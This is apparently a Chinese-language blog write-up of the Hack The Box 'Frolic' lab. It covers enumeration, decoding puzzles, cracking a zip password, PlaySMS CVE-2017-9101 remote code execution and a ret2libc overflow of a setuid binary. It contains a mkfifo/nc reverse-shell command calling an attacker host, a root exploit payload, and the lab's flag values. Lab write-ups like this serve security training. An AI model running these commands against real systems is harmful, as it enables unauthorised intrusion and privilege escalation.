Frolic-htb-writeup

0x00 靶场技能介绍

章节技能:目录枚举、js源码敏感信息泄露、Ook! 加密解密、base64加密解密、PK头压缩包文件输出、压缩包密码破解、Brainfuck加密解密、CVE-2017-9101漏洞利用、Return-oriented programming技术、缓冲区溢出技术、提交脚本编写

参考链接:https://www.jgeek.cn/article/74#3_354

参考链接:https://0xdf.gitlab.io/2019/03/23/htb-frolic.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.111

2、端口扫描下开放端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌─[us-vip-22]─[10.10.14.2]─[htb-shiyan@htb-sozld0isvs]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV -T4 10.10.10.111
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-16 03:34 GMT
Nmap scan report for 10.10.10.111
Host is up (0.11s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 877b912a0f11b6571ecb9f77cf35e221 (RSA)
|   256 b79b06ddc25e284478411e677d1eb762 (ECDSA)
|_  256 21cf166d82a430c3c69cd738bab502b0 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2023-12-16T03:34:37
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2023-12-16T09:04:37+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_clock-skew: mean: -1h49m59s, deviation: 3h10m31s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.12 seconds

3、看下smb协议相关内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌─[us-vip-22]─[10.10.14.2]─[htb-shiyan@htb-sozld0isvs]─[~/Desktop]
└──╼ [★]$ smbclient -L 10.10.10.111
Password for [WORKGROUP\htb-shiyan]:

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (frolic server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

┌─[us-vip-22]─[10.10.14.2]─[htb-shiyan@htb-sozld0isvs]─[~/Desktop]
└──╼ [★]$ smbmap -H 10.10.10.111 -u null -p null
[+] Guest session   	IP: 10.10.10.111:445	Name: 10.10.10.111                                      
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	IPC$                                              	NO ACCESS	IPC Service (frolic server (Samba, Ubuntu))

4、通过9999端口的网站获取到一个账号密码信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
访问admin目录
http://10.10.10.111:9999/admin

查看login.js文件源代码
view-source:http://10.10.10.111:9999/admin/js/login.js

var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;
if ( username == "admin" && password == "superduperlooperpassword_lol"){
alert ("Login successfully");
window.location = "success.html"; // Redirecting to other page.
return false;
}
else{
attempt --;// Decrementing by one.
alert("You have left "+attempt+" attempt;");
// Disabling fields after 3 attempts.
if( attempt == 0){
document.getElementById("username").disabled = true;
document.getElementById("password").disabled = true;
document.getElementById("submit").disabled = true;
return false;
}
}
}

5、获取到一个登录账号密码,使用该账号密码去登录admin后台目录

admin
superduperlooperpassword_lol

http://10.10.10.111:9999/admin/success.html

1
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.

6、获取到一个加密字符串,使用下列网站对该密文进行破解

1
2
3
https://www.dcode.fr/ook-language

Nothing here check /asdiSIAJJ0QWE9JAS

7、获取到一个目录信息,继续访问该目录地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
view-source:http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/

UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA

┌──(kali㉿kali)-[~/桌面]
└─$ echo UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA  | base64 -d
PK     É7M#�[�i index.phpUT     �|�[�|�[ux
                                          ^D�J�s�h�)�P�n
                                                        ��Ss�Jw▒܎��4��k�z��UȖ�+X��P��ᶇ��л�x_�N�[���S��8�����J2S�*�DЍ}�8dTQk������j_���▒���'xc��ݏt��75Q�
                                                              ���k,4��b)�4F��   ���������&q2o�WԜ�9P#�[�iPK      É7M#�[�i ▒��index.phpUT�|�[ux
                                                    PKO                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ 

┌──(kali㉿kali)-[~/桌面]
└─$ echo UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA  | base64 -d > 1.zip

8、通过上面的操作发现这是一个压缩包的内容,但是压缩包存在密码,需要进行破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/桌面]
└─$ zip2john 1.zip > hashzip
ver 2.0 efh 5455 efh 7875 1.zip/index.php PKZIP Encr: TS_chk, cmplen=176, decmplen=617, crc=145BFE23 ts=89C3 cs=89c3 type=8

┌──(kali㉿kali)-[~/桌面]
└─$ john ./hashzip 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
password         (1.zip/index.php)     
1g 0:00:00:00 DONE 2/3 (2023-12-16 13:23) 50.00g/s 9059Kp/s 9059Kc/s 9059KC/s 123456..Sssing
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(kali㉿kali)-[~/桌面]
└─$ unzip 1.zip                        
Archive:  1.zip
[1.zip] index.php password: 
  inflating: index.php

9、获取到一个 index.php 文件,继续查看该文件信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/桌面]
└─$ cat index.php 
4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a

┌──(kali㉿kali)-[~/桌面]
└─$ echo 4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a  | xxd -p -r
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwrKysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysgK1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0tLS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==

shiyan@InfoSec ~ % echo KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwrKysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysgK1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0tLS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==  | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..< 
shiyan@InfoSec ~ %

10、发现还是一串密文,继续使用网站进行破解

1
2
3
https://www.dcode.fr/brainfuck-language

idkwhatispass

11、获取到一个密码,但是不知道是哪里的,各种尝试也不是想象中的密码,继续目录扫描下

1
2
3
4
5
http://10.10.10.111:9999/backup/

password.txt
user.txt
loop/

http://10.10.10.111:9999/test/

python3 dirsearch.py -u http://10.10.10.111:9999 -r -R 3 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

http://10.10.10.111:9999/dev/backup/

12、访问该目录,发现了一个playsms的一个网站,然后使用上述admin:idkwhatispass,成功登录该CMS服务

13、通过搜索该框架的搜索

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit playsms                           
------------------------------------------------------- ---------------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- ---------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload | php/remote/44598.rb
PlaySMS - index.php Unauthenticated Template Injection | php/remote/48335.rb
PlaySms 0.7 - SQL Injection                            | linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting         | php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions  | php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion                | php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery           | php/webapps/30177.txt
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Executio | php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution       | php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticat | php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                    | php/webapps/42038.txt
PlaySMS 1.4.3 - Template Injection / Remote Code Execu | php/webapps/48199.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/42044.txt
  Exploit: PlaySMS 1.4 - 'import.php' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/42044
     Path: /usr/share/exploitdb/exploits/php/webapps/42044.txt
    Codes: CVE-2017-9101
 Verified: True
File Type: HTML document, ASCII text
Copied to: /home/kali/桌面/42044.txt

14、各种搜集 CVE-2017-9101 成功发现了一个能用的payload文件,至此获取到第一个flag文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
https://raw.githubusercontent.com/jasperla/CVE-2017-9101/03ceed61209b805a02ca27d57cc2e7a4b51b5288/playsmshell.py

┌──(kali㉿kali)-[~/桌面]
└─$ touch cve-2017-9101.py

┌──(kali㉿kali)-[~/桌面]
└─$ python3 cve-2017-9101.py --url http://10.10.10.111:9999/playsms --password idkwhatispass -c id 
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
[*] Attempting to execute payload
uid=33(www-data) gid=33(www-data) groups=33(www-data)

┌──(kali㉿kali)-[~/桌面]
└─$ python3 cve-2017-9101.py --url http://10.10.10.111:9999/playsms --password idkwhatispass -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.10 443 >/tmp/f"
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
[*] Attempting to execute payload

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443  
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.111] 39362
bash: cannot set terminal process group (1200): Inappropriate ioctl for device
bash: no job control in this shell
www-data@frolic:~/html/playsms$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@frolic:~/html/playsms$
www-data@frolic:~/html/playsms$ ls -la /home/
ls -la /home/
total 16
drwxr-xr-x  4 root  root  4096 Sep  9  2022 .
drwxr-xr-x 22 root  root  4096 Sep  9  2022 ..
drwxr-xr-x  3 ayush ayush 4096 Sep  9  2022 ayush
drwxr-xr-x  7 sahay sahay 4096 Sep  9  2022 sahay
www-data@frolic:~/html/playsms$ ls -la /home/ayush
ls -la /home/ayush
total 28
drwxr-xr-x 3 ayush ayush 4096 Sep  9  2022 .
drwxr-xr-x 4 root  root  4096 Sep  9  2022 ..
lrwxrwxrwx 1 root  root     9 Sep  9  2022 .bash_history -> /dev/null
-rw-r--r-- 1 ayush ayush  220 Sep 23  2018 .bash_logout
-rw-r--r-- 1 ayush ayush 3771 Sep 23  2018 .bashrc
drwxrwxr-x 2 ayush ayush 4096 Sep  9  2022 .binary
-rw-r--r-- 1 ayush ayush  655 Sep 23  2018 .profile
-rwxr-xr-x 1 ayush ayush   33 Dec 16 10:07 user.txt
www-data@frolic:~/html/playsms$ cat /home/ayush/user.txt
cat /home/ayush/user.txt
496365c58a5f5e5ba2460b11aed9e595
www-data@frolic:~/html/playsms$

0x02 系统权限获取

15、通过查看参考文档,发现了 rop 文件

一般 rop 是指逆向中的一个技术:ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。

1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@frolic:~/html/playsms$ ls -la /home/ayush/.binary/rop
ls -la /home/ayush/.binary/rop
-rwsr-xr-x 1 root root 7480 Sep 25  2018 /home/ayush/.binary/rop
www-data@frolic:~/html/playsms$ cd /home/ayush/.binary/
cd /home/ayush/.binary/
www-data@frolic:/home/ayush/.binary$ ls
ls
rop
www-data@frolic:/home/ayush/.binary$ ldd rop
ldd rop
        linux-gate.so.1 =>  (0xb7fda000)
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
        /lib/ld-linux.so.2 (0xb7fdb000)

16、通过Base64方法,获取文件到本地

1
2
3
4
5
6
7
www-data@frolic:/home/ayush/.binary$ base64 ./rop -w 0
.............


┌──(kali㉿kali)-[~/桌面]
└─$ >....                                                                                
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  | base64 -d > rop

17、这个过程涉及到对 rop 文件的缓冲区溢出分析步骤,我由于不会,且oscp现在阶段也不考试这个了,等后续了我有空了学习了,再专门开几篇学习缓冲区溢出的文章。

18、这里直接使用参考文档里的方法,直接提权获取到最终的flag文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
www-data@frolic:/tmp$ cd /home/ayush/.binary 
cd /home/ayush/.binary
www-data@frolic:/home/ayush/.binary$ ls
ls
rop
www-data@frolic:/home/ayush/.binary$


www-data@frolic:/tmp$ cd /home/ayush/.binary 
cd /home/ayush/.binary
www-data@frolic:/home/ayush/.binary$ ls
ls
rop
www-data@frolic:/home/ayush/.binary$ ./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
<d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')                     
id
uid=0(root) gid=33(www-data) groups=33(www-data)
cat /root/root.txt
05afffd0ae064995a8a4cb627e499859

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/158

打靶记
#shooting-range
Frolic-htb-writeup
https://sh1yan.top/2023/12/15/Frolic-htb-writeup/
作者
shiyan
发布于
2023年12月15日
许可协议